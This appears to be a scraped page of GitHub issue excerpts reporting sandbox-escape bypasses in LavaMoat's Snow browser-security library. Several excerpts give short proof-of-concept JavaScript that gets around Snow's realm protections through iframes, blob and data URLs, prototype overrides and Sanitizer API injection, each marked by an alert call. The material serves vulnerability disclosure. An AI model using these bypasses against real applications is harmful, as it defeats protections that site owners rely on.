snow
snow copied to clipboard
LavaMoat
Use Snow to finally secure your web app's same origin realms!
In order to prevent Blob URIs from being created within workers, snow overrides the `Worker` constructor using the following code: ```js const native = win.Worker; win.Worker = function Worker(aURL, options)...
Snow overrides the `URL.createObjectURL` function to only allow creation of Blob URLs if the blob type is included in a specific whitelist that Snow keeps. However, if the blob isn't...
```js var url = URL.createObjectURL(new Blob(['alert(window.origin)'])) var x = document.createElement('iframe'); x.srcdoc = `` document.body.appendChild(x); ```
Reproduce by running ```javascript let i = document.createElement('iframe'); i.srcdoc=""; document.body.append(i) setTimeout(x=>i.contentWindow[0].alert(1337),500) ```
Reproduce by running ```javascript let x = document.createElement('iframe') x.src='data:text/html,' document.body.appendChild(x) setTimeout(()=>{ x.contentWindow[0].alert.call(window, 'hi') },500) ``` honestly not sure how youd fix this
The code for checking if the extended element is framable doesn't make sure that the value is a string (alternatively; that the value checked is the same value that is...
## PoC: ```js // get the original ArrayIterator.prototype.next method var next = [].values().__proto__.next; // overwrite the method [].values().__proto__.next = function(){ var x = next.call(this); var win = x?.value; // leak...
PoC: ```js Object.defineProperty(NodeList.prototype, 'length', {value:0}); document.body.innerHTML = ''; iframe.alert(1337); ``` Vulnerable path: 1. `getFramesArray` called in https://github.com/LavaMoat/snow/blob/1c8faa81291e6f6dffe62b7106eff2492213375d/src/inserters.js#L29 2. `slice()` called on the results from `querySelectorAll` in https://github.com/LavaMoat/snow/blob/1c8faa81291e6f6dffe62b7106eff2492213375d/src/utils.js#L111-L113 produces an empty...
```javascript setInterval(x=>xyz.alert(1337),0); i=document.createElement('iframe'); i.name='xyz'; f=document.createElement('form'); b=document.createElement('button'); b.formTarget='xyz'; b.formAction='1'; f.append(b); document.body.append(f); document.body.append(i); b. click() ```
This is similar #142 but I use the Sanitizer API to inject the meta tag ```JavaScript i=document.createElement('iframe'); i.src=123; i.name='xyz'; counter=0; i.onload=x=>{ i.contentDocument.body.setHTML('', {sanitizer:new Sanitizer({allowElements: [ "meta" ],allowAttributes:{"http-equiv":["meta"],"content":["meta"]}})}); counter++; if(counter>1){ i.onload=null;...